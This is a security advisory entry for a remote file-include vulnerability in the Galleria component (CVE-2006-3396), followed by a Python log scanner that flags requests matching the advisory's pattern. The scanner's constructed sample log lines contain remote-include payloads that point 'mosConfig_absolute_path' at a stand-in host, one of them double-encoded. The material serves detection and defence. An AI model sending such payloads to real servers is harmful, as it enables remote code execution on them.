Alias(es) | Galleria.galleria.html.php.File.Inclusion |
Release Date | Feb 02, 2007 |
Severity | medium |
Impact | Gain Access |
Description | Galleria has a remote file-include vulnerability. A remote attacker could execute an arbitrary script on the web server with the privileges of the server, via a specially-crafted URL request to the galleria.html.php script, by using the 'mosConfig_absolute_path' parameter to specify a malicious PHP file from a remote system. |
Affected Products | Galleria version 1.0 and prior. |
Recommended Actions | Apply patch: http://forum.mamboserver.com/showthread.php?t=83001 |
Coverage | IPS, VCM |
Common Vulnerabilities and Exposures (CVE) | CVE-2006-3396 |
Reference/s | http://www.frsirt.com/english/advisories/2006/2666 (FrSIRT), http://www.securityfocus.com/bid/18808 (BugTraq) |
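
Added example (not part of the original advisory or of any vendor signature): a log check for the request pattern in the Description, flagging requests to galleria.html.php whose 'mosConfig_absolute_path' value is a remote URL, including percent-encoded forms. The log lines, the /site/ path and the remote.example host are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "galleria.html.php"          # script named in the advisory
PARAM = "mosConfig_absolute_path"     # parameter named in the advisory
# A value that starts with scheme://host or //host points off the server.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Request line as written in common/combined access log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (%253A -> %3A -> ':')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(target):
    """True if the request target matches the advisory's pattern."""
    parts = urlsplit(target)
    if not fully_decode(parts.path).lower().endswith(SCRIPT):
        return False
    # parse_qsl decodes once; fully_decode handles extra encoding layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if fully_decode(name) == PARAM and REMOTE.match(fully_decode(value)):
            return True
    return False

def scan(lines):
    """Return 1-based numbers of log lines that match."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append(number)
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Feb/2007:10:00:01 +0000] "GET /index.php?option=com_galleria HTTP/1.1" 200 4096',
    '203.0.113.5 - - [02/Feb/2007:10:00:02 +0000] "GET /site/galleria.html.php?mosConfig_absolute_path=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [02/Feb/2007:10:00:03 +0000] "GET /site/galleria.html.php?mosConfig_absolute_path=http%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Feb/2007:10:00:04 +0000] "GET /site/galleria.html.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    print("matching log lines:", scan(SAMPLE_LOG))
```

A match shows only that the request was made; whether the include succeeded depends on the installed version and the patch status listed above.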